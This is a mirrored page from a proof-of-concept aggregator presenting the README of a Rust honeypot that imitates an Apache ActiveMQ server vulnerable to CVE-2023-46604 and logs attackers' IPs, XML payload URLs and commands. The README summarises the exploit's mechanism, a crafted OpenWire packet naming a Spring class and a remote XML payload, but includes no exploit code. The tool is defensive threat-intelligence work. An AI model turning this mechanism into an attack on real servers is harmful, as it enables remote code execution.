POC详情: 4de2eeafadcbdac58476167185b0d0af1984b17d

来源
https://github.com/mranv/honeypot.rs
关联漏洞
标题: Apache ActiveMQ 代码问题漏洞 (CVE-2023-46604)
描述:Apache ActiveMQ是美国阿帕奇(Apache)基金会的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ 5.15.16之前、5.16.7之前、5.17.6之前或5.18.3之前版本存在代码问题漏洞,该漏洞源于允许具有代理网络访问权限的远程攻击者通过操纵 OpenWire 协议中的序列化类类型来运行任意 shell 命令。
描述
 CVE-2023-46604 (Apache ActiveMQ RCE Vulnerability) and focused on getting Indicators of Compromise.
介绍
# honeypot.rs

Honeypot that scopes [CVE-2023-46604 (Apache ActiveMQ RCE Vulnerability)](https://nvd.nist.gov/vuln/detail/CVE-2023-46604) and focused on getting Indicators of Compromise. This honeypot can be used in any Threat Intelligence infrastructure to get attacker's IP adresses, Post-Exploitation samples and malware samples. This information can be helpful to detect and prevent attacks in future.

# How it works?

In real case attacker sends specific packet to Apache ActiveMQ service. This packet contains ExceptionResponse with Class `org.springframework.context.support.ClassPathXmlApplicationContext` and Message which contains XML payload url.
| ![Attack Example](assets/attack_example.png) |
|:--:|
| _Attack Example_ |

Secondly, vulnerable service downloads XML payload which commonly contains RCE command.
| ![XML Payload Example](assets/xml_loading_example.png) |
|:--:|
| _XML Payload Example_ |

This honeypot simulates vulnerable Apache ActiveMQ service and extracts attacker's ip addresses, XML payload url and RCE command from XML payload. Then this information can be parsed from JSON.

Honeypot logs can be checked by path `logfile` that you specified in `Service.toml`.
| ![Honeypot Logs](assets/real_attack_logs.png) |
|:--:|
| _Honeypot Logs_ |

Honeypot also creates JSON output with parsable indicators. You can specify path of `outfile` in `Service.toml`.
| ![JSON Output](assets/real_attack_json.png) |
|:--:|
| _JSON Output_ |

# Installation

Honeypot can be deployed on your own server (for example VPS or VDS) in docker variant.

### Configuration

Service configuration file `Service.toml` can be changed by your own:

```
service_ip = "0.0.0.0" # listen ip address
service_port = 61616 # port (default for Apache ActiveMQ 61616)
logfile = "logs/service.log" # main log file
outfile = "logs/out.json" # output json for parsing
api_enabled = false # enabled or disable api for downloading honeypot results (true/false)
api_ip = "0.0.0.0" # listen ip address for api
api_port = 9123 # port for api
api_user = "user" # user for api auth
api_password = "" # password for api auth
```

You can enable api if you want to have access to `out.json`. Results can be downloaded using curl:

```
curl -X POST http://<api_ip>:<api_port>/ --data 'username=<api_user>&password=<api_password>'
```

### Using docker

```
git clone https://github.com/mranv/honeypot.rs -b main
cd activemq-honeypot
docker compose up --build -d
```

You also should disable original Apache ActiveMQ (if exists) and make sure that configured port not used by another process. Service building can take some time.

You also can change `LevelFilter` to `Debug` in `main.rs` and get more helpful debug info
| ![Debug Level](assets/debug_level_example.png) |
|:--:|
| _Debug LevelFilter_ |
文件快照
 [4.0K]  /data/pocs/4de2eeafadcbdac58476167185b0d0af1984b17d
├── [4.0K]  assets
│   ├── [ 22K]  attack_example.png
│   ├── [ 59K]  debug_level_example.png
│   ├── [ 25K]  real_attack_json.png
│   ├── [136K]  real_attack_logs.png
│   └── [ 75K]  xml_loading_example.png
├── [ 41K]  Cargo.lock
├── [ 510]  Cargo.toml
├── [ 205]  docker-compose.yml
├── [ 258]  Dockerfile
├── [ 11K]  LICENSE
├── [4.0K]  logs
├── [2.7K]  README.md
├── [4.0K]  resources
│   └── [ 313]  openwire_response.dat
├── [ 189]  Service.toml
└── [4.0K]  src
    ├── [3.9K]  backend.rs
    ├── [ 220]  data.rs
    ├── [4.9K]  fakeserver.rs
    └── [7.4K]  main.rs

4 directories, 17 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。